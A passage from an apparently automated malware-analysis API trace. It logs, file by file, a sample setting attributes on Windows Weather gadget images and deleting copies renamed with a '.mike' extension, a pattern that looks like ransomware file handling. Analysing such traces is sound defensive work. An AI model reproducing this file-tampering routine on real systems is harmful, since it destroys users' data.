lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.291] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.291] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_partly-cloudy.png.mike")) returned 1 [0106.293] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.298] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png", dwFileAttributes=0x80) returned 0 [0106.298] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_snow.png.mike")) returned 1 [0106.300] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.305] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png", dwFileAttributes=0x80) returned 0 [0106.306] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_sun.png.mike")) returned 1 [0106.307] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.312] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png", dwFileAttributes=0x80) returned 0 [0106.313] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_windy.png.mike")) returned 1 [0106.315] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.320] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png", dwFileAttributes=0x80) returned 0 [0106.320] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_cloudy.png.mike")) returned 1 [0106.323] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.328] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png", dwFileAttributes=0x80) returned 0 [0106.328] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_few-showers.png.mike")) returned 1 [0106.330] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.335] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png", dwFileAttributes=0x80) returned 0 [0106.336] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_foggy.png.mike")) returned 1 [0106.337] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.342] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png", dwFileAttributes=0x80) returned 0 [0106.342] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_hail.png.mike")) returned 1 [0106.344] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.350] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png", dwFileAttributes=0x80) returned 0 [0106.350] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_rainy.png.mike")) returned 1 [0106.352] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.357] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png", dwFileAttributes=0x80) returned 0 [0106.357] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_snow.png.mike")) returned 1 [0106.359] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.407] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png", dwFileAttributes=0x80) returned 0 [0106.407] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_thunderstorm.png.mike")) returned 1 [0106.409] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.412] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png", dwFileAttributes=0x80) returned 0 [0106.413] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\graystateicon.png.mike")) returned 1 [0106.415] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.418] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png", dwFileAttributes=0x80) returned 0 [0106.418] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\greenstateicon.png.mike")) returned 1 [0106.420] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.424] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png", dwFileAttributes=0x80) returned 0 [0106.425] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\info.png.mike")) returned 1 [0106.427] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.431] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png", dwFileAttributes=0x80) returned 0 [0106.432] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\notconnectedstateicon.png.mike")) returned 1 [0106.433] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.437] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png", dwFileAttributes=0x80) returned 0 [0106.437] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\redstateicon.png.mike")) returned 1 [0106.439] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.443] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png", dwFileAttributes=0x80) returned 0 [0106.443] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\search_background.png.mike")) returned 1 [0106.445] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.452] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png", dwFileAttributes=0x80) returned 0 [0106.452] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked-loading.png.mike")) returned 1 [0106.454] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png", dwFileAttributes=0x80) returned 0 [0106.461] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_cloudy.png.mike")) returned 1 [0106.464] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.470] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png", dwFileAttributes=0x80) returned 0 [0106.470] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_few-showers.png.mike")) returned 1 [0106.472] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.479] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_foggy.png", dwFileAttributes=0x80) returned 0 [0106.479] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_foggy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_foggy.png.mike")) returned 1 [0106.481] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.487] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_hail.png", dwFileAttributes=0x80) returned 0 [0106.488] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_hail.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_hail.png.mike")) returned 1 [0106.490] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.495] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter.png", dwFileAttributes=0x80) returned 0 [0106.495] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-first-quarter.png.mike")) returned 1 [0106.497] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.505] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.505] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter_partly-cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-first-quarter_partly-cloudy.png.mike")) returned 1 [0106.507] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.513] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full.png", dwFileAttributes=0x80) returned 0 [0106.513] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-full.png.mike")) returned 1 [0106.515] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.521] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.522] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full_partly-cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-full_partly-cloudy.png.mike")) returned 1 [0106.523] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.529] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter.png", dwFileAttributes=0x80) returned 0 [0106.529] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-last-quarter.png.mike")) returned 1 [0106.531] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.538] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.538] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter_partly-cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-last-quarter_partly-cloudy.png.mike")) returned 1 [0106.540] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new.png", dwFileAttributes=0x80) returned 0 [0106.545] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-new.png.mike")) returned 1 [0106.548] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.554] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.554] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new_partly-cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-new_partly-cloudy.png.mike")) returned 1 [0106.557] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.562] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent.png", dwFileAttributes=0x80) returned 0 [0106.563] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-crescent.png.mike")) returned 1 [0106.565] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.571] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.571] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent_partly-cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-crescent_partly-cloudy.png.mike")) returned 1 [0106.573] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.580] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-gibbous.png", dwFileAttributes=0x80) returned 0 [0106.582] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.588] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-gibbous_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.589] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.595] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-crescent.png", dwFileAttributes=0x80) returned 0 [0106.597] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.603] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-crescent_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.605] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.611] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-gibbous.png", dwFileAttributes=0x80) returned 0 [0106.613] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.619] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-gibbous_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.621] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.628] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_rainy.png", dwFileAttributes=0x80) returned 0 